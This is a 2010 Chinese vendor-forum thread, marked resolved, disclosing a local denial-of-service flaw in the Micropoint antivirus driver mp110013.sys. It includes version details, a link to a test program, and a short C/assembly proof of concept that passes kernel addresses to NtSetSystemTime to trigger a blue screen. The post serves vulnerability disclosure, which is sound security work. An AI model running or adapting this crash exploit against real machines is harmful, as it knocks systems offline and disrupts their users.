微点交流论坛

标题: 【解决】1:微点mp110013.sys <= 1.3.10123.0 NtSetSystemTimeHook本地拒绝服务漏洞 [打印本页]

作者: 点饭的百度空间 时间: 2010-4-6 19:54 标题: 【解决】1:微点mp110013.sys <= 1.3.10123.0 NtSetSystemTimeHook本地拒绝服务漏洞

2010-04-06 19:44

产品版本：微点主动防御：mp.100323.1.2.10581.0278.r1

文件版本：mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8

问题：不正确地处理NtSetSystemTime的参数，引发本地拒绝服务漏洞

测试程序：http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun.rar

POC code:

int main(int argc, char* argv[])
{
printf("Micropoint Local D.O.S Vulnerability\n"
"BSOD Micropoint for fun!\n"
"By MJ0011\nth_decoder$126.com\n\nPress Enter...\n");
getchar();
PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");

__asm
{
push 0x80000000
push 0x80000000
call pAddr
}
return 0;
}

[ Last edited by Legend on 2010-4-27 at 13:39 ]

作者: 镜湖YES 时间: 2010-4-6 20:06
楼主不愧是IT从业人员

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn